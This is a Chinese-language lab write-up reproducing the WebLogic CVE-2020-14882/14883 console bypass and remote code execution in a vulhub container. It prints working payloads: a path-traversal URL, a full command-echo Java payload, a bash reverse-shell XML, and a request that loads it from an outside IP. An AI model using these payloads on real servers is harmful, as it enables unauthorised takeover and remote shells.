本文涉及靶場知識點-
CVE-2020-14882&14883 weblogic未授權訪問漏洞
https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECIDfdd4-97c8-4e32-89b7-df58dd102e4c&pk_campaign=weixin-wemedia
簡介
WebLogic 是美國 Oracle 公司的主要產品之一,是商業市場上主要的 J2EE 應用伺服器軟體,也是世界上第一個成功商業化的 J2EE 應用伺服器,在 Java 應用伺服器中有非常廣泛的部署和應用。
概述
10 月 21 日,Oracle 官方發布數百個組件的高危漏洞公告。其中組合利用 CVE-2020-14882/CVE-2020-14883 可使未經授權的攻擊者繞過 WebLogic 後臺登錄等限制,最終遠程執行代碼接管 WebLogic 伺服器,利用難度極低,風險極大。
此處漏洞均存在於 WebLogic 的控制臺中。該組件為 WebLogic 全版本自帶組件,並且該漏洞通過 HTTP 協議進行利用。
CVE-2020-14882允許未授權的用戶繞過管理控制臺的權限驗證訪問後臺,CVE-2020-14883允許後臺任意用戶通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通過一個GET請求在遠程Weblogic伺服器上以未授權的任意用戶身份執行命令。
影響版本
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0
環境搭建
此處利用vulhub的環境進行復現,新建docker-compose.yml
version: '2'services:weblogic:image: vulhub/weblogic:12.2.1.3-2018ports:- "7001:7001"
執行以下命令會下載鏡像並以此鏡像啟動一個容器,映射的埠為7001
docker-compose up -d
漏洞復現
權限繞過漏洞(CVE-2020-14882)復現:
因為CVE-2020-14882未授權訪問漏洞是繞過管理控制臺權限訪問後臺,所以需要存在console控制臺,打開瀏覽器訪問:
http://ip:port/console
從上一步結果發現是存在管理控制臺的,在正常訪問console後臺時會讓我們輸入帳號密碼。通過未授權訪問,則可以直接繞過驗證登錄後臺,漏洞
URL:/console/css/%252e%252e%252fconsole.portal
未授權訪問控制臺頁面:
正常輸入帳號密碼登錄控制臺頁面:
通過對比可以看到通過未授權訪問的後臺與正常登陸的後臺差異,由於權限不足,缺少部署等功能,無法安裝應用,所以也無法通過後臺部署war包等方式直接獲取權限。「%252E%252E%252F」為二次url編碼的「../」,通過這個就可以實現穿越路徑未授權訪問相關管理後臺。
後臺任意命令執行漏洞(CVE-2020-14883)復現:
利用方式一
com.tangosol.coherence.mvel2.sh.ShellSession
但此利用方法只能在 Weblogic 12.2.1 及以上版本利用,因為 10.3.6 並不存在 com.tangosol.coherence.mvel2.sh.ShellSession 類。
在12.2.1.3版本執行"id"命令 burpsuite
GET /console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%20=%20(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork();%20java.lang.reflect.Field%20field%20=%20adapter.getClass().getDeclaredField(%22connectionHandler%22);field.setAccessible(true);Object%20obj%20=%20field.get(adapter);weblogic.servlet.internal.ServletRequestImpl%20req%20=%20(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(%22getServletRequest%22).invoke(obj);%20String%20cmd%20=%20req.getHeader(%22cmd%22);String[]%20cmds%20=%20System.getProperty(%22os.name%22).toLowerCase().contains(%22window%22)%20?%20new%20String[]{%22cmd.exe%22,%20%22/c%22,%20cmd}%20:%20new%20String[]{%22/bin/sh%22,%20%22-c%22,%20cmd};if(cmd%20!=%20null%20){%20String%20result%20=%20new%20java.util.Scanner(new%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(%22\\A%22).next();%20weblogic.servlet.internal.ServletResponseImpl%20res%20=%20(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(%22getResponse%22).invoke(req);res.getServletOutputStream().writeStream(new%20weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}%20currentThread.interrupt(); HTTP/1.1Host: 192.168.74.141:7001Pragma: no-cachecmd: idCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6Cookie: ADMINCONSOLESESSION=ufkDQ2w_WXPmMBVQWCpxVBrNdKxp4L58RhydPTssNxYAmgnYP-4Y!-326883263; ADMINCONSOLESESSION=lGPJf1JPnXR7pG1qZzw0xXmwGtMQcPpJ0GVJrg0pv0LGCS6LdH0g!1599365627Connection: close
回顯payload:
/console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27weblogic.work.ExecuteThread%20currentThread%20=%20(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork();%20java.lang.reflect.Field%20field%20=%20adapter.getClass().getDeclaredField(%22connectionHandler%22);field.setAccessible(true);Object%20obj%20=%20field.get(adapter);weblogic.servlet.internal.ServletRequestImpl%20req%20=%20(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(%22getServletRequest%22).invoke(obj);%20String%20cmd%20=%20req.getHeader(%22cmd%22);String[]%20cmds%20=%20System.getProperty(%22os.name%22).toLowerCase().contains(%22window%22)%20?%20new%20String[]{%22cmd.exe%22,%20%22/c%22,%20cmd}%20:%20new%20String[]{%22/bin/sh%22,%20%22-c%22,%20cmd};if(cmd%20!=%20null%20){%20String%20result%20=%20new%20java.util.Scanner(new%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(%22\\A%22).next();%20weblogic.servlet.internal.ServletResponseImpl%20res%20=%20(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(%22getResponse%22).invoke(req);res.getServletOutputStream().writeStream(new%20weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}%20currentThread.interrupt();
在10.3.6版本執行會報錯
利用方式二
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
這是一種更為通殺的方法,最早在CVE-2019-2725被提出,對於所有Weblogic版本均有效。
首先,我們需要構造一個XML文件,並將其保存在Weblogic可以訪問到的伺服器上,這裡是執行一個反彈shell的操作,如
http://example.com/rce.xml:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" init-method="start"><constructor-arg><list><value>/bin/bash</value><value>-c</value><value><![CDATA[bash -i >& /dev/tcp/ip/1234 0>&1]]></value></list></constructor-arg></bean></beans>
nc監聽,然後執行一個get請求:
http://192.168.74.141:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://139.9.198.30/rce.xml")
nc監聽的埠得到反彈shell
經過測試,該方法在12.2.1.3以及10.3.6版本都可以執行
漏洞修復
目前 Oracle 官方已發布了最新針對該漏洞的補丁,請受影響用戶及時下載補丁程序並安裝更新。Oracle 官方補丁需要用戶持有正版軟體的許可帳號,使用該帳號登陸 https://support.oracle.com 後,可以下載最新補丁。
參考連結
https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md
https://github.com/jas502n/CVE-2020-14882